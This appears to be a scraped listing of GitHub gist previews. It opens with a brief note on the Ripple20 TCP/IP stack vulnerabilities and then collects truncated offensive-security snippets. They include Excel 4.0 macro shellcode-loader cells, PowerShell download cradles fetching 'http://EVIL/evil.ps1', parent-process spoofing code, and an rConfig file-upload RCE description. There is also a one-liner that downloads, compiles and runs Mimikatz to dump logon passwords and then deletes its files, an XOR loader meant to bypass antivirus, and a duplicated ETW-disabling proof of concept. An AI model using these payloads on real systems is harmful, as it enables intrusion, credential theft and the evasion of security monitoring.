- Ripple20 is the codename to a set of 19 vulnerabilities discovered by the cybersecurity team JSOF.
- These vulnerabilities are inside an IP stack, selled under two different names (Treck TCP/IP for U.S market Kasago TCP/IP, for Asia market. -These two stacks were bought and used under privated-labeled by several softwares companies, some known names are: GHnetv2, Kwiknet, Quadnet.
- But there's more, these stacks were also integrated, sometimes with modifications, inside several RTOS (real-time operating system).
- Last, some of the vulnerabilities, depending the device operating system, configuration or location can have greater or lower CVSS score.
- My advice is for companies to ask their suppliers if they use one of this stack and assess the risk following their company risk policy.
- This will not be an easy set of vulnerabilities to patch, sadly.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Once Excel is opened, click on the active tab, select "Insert" then "Macro MS Excel 4.0". | |
================================================================================ | |
Paste this in cells in column A, starting in cell A1: | |
================================================================================ | |
=REGISTRE("Kernel32";"VirtualAlloc";"JJJJJ";"VAlloc";;1;9) | |
=REGISTRE("Kernel32";"WriteProcessMemory";"JJJCJJ";"WProcessMemory";;1;9) | |
=REGISTRE("Kernel32";"CreateThread";"JJJJJJJ";"CThread";;1;9) | |
=VAlloc(0;4096;4096;64) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */ | |
/* spoof.exe explorer.exe calc.exe */ | |
#include <windows.h> | |
#include <tlhelp32.h> | |
#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000 | |
typedef struct _STARTUPINFOEX { | |
STARTUPINFO StartupInfo; | |
LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Remote Code Execution via File Upload (CVE-2020-12255) | |
The rConfig 3.9.4 is vulnerable to remote code execution due to improper checks/validation via the file upload functionality. | |
The vendor.crud.php accepts the file upload by checking through content-type and it is not restricting upload by checking the file extension and header. | |
Due to this flaw, An attacker can exploit this vulnerability by uploading a PHP file that contains arbitrary code (shell) and changing the content-type to `image/gif` in the vendor.crud.php. | |
since the validation checks are happening through content-type the server would accept the PHP file uploaded ultimately resulting code execution upon the response when invoked. | |
Steps To Reproduce-: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html lang="en" dir="ltr"> | |
<head> | |
<meta charset="utf-8"> | |
<title></title> | |
<h1>working on chrome linux & mac</h1> | |
<a href="" target=_blank>click me before</a> | |
</head> | |
<body> | |
<button type="button" id=clickme name="button">click me</button> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Author: Arno0x0x, Twitter: @Arno0x0x | |
Completely based on @Flangvik netloader | |
This partial rewrite of @Flangvik Netloader includes the following changes: | |
- Allow loading of an XOR encrypted binary to bypass antiviruses | |
To encrypt the initial binary you can use my Python transformFile.py script. | |
Example: ./transformFile.py -e xor -k mightyduck -i Rubeus.bin -o Rubeus.xor | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
// | |
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
// and then resuming the process. | |
// | |
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
#define INJECT_PARAM_LEN 43 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on | |
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET. | |
// | |
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables, | |
// and then resuming the process. | |
// | |
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/) | |
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0" | |
#define INJECT_PARAM_LEN 43 |
NewerOlder